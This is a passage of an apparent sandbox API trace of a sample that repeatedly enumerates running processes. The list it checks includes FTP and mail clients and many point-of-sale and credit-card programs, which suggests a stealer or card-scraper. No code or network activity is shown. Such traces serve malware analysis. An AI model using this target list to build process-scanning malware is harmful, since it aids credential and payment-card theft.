cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0199.335] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0199.337] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0199.436] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0199.439] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0199.442] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0199.445] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0199.447] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0199.587] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0199.602] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0199.604] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0199.607] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0199.609] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0199.611] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0199.612] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0199.614] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0199.616] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0199.675] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0199.677] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0199.680] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0199.682] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0199.685] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0199.687] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0199.689] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0199.690] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0199.692] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0199.694] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0199.696] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0199.697] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0199.700] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0199.702] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0199.703] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0199.705] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0199.706] CloseHandle (hObject=0x21f8) returned 1 [0199.706] Sleep (dwMilliseconds=0x64) [0199.862] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0199.879] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.881] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0199.883] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0199.886] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.890] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0199.892] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.894] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0199.895] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0199.897] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0199.898] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.899] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.904] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0199.905] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.907] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.910] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.912] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.913] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.915] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.916] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.922] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0199.923] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0199.925] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0199.927] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.929] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.931] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0199.935] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0199.937] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0199.939] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0199.941] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.942] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0199.944] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0199.945] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0199.947] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0200.087] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0200.090] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0200.092] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0200.094] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0200.095] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0200.097] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0200.098] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0200.100] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0200.102] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0200.104] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0200.108] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0200.110] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0200.112] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0200.114] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0200.115] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0200.117] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0200.118] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0200.120] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0200.214] Process32Next 